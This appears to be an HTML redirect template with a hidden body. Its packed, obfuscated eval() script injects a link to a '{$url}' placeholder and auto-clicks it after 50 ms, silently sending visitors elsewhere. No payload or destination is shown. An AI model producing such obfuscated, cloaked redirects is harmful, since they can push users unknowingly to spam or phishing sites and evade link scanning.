<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title></title>
<meta name="viewport" content="initial-scale=1, maximum-scale=1">
<script type="text/javascript" src="http://lib.sinaapp.com/js/jquery/1.9.1/jquery-1.9.1.min.js"></script>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head>
<body style="display:none;">
</body>
<script type="text/javascript">
!window.jQuery && document.write('<script src="http://libs.baidu.com/jquery/1.9.1/jquery.min.js"><\/script>');
</script>
<script>
var l = "{$url}";
$(function(){
    eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('$("7").8("<a 2=\'"+6+"\' 5=\'0\'></a>");$("#0").3(1(){4.d=$(e).9("2")});b(1(){$("#0").3()},c);',15,15,'ck|function|href|click|document|id|l|body|append|attr||setTimeout|50|location|this'.split('|'),0,{}))
});
</script> 
</html>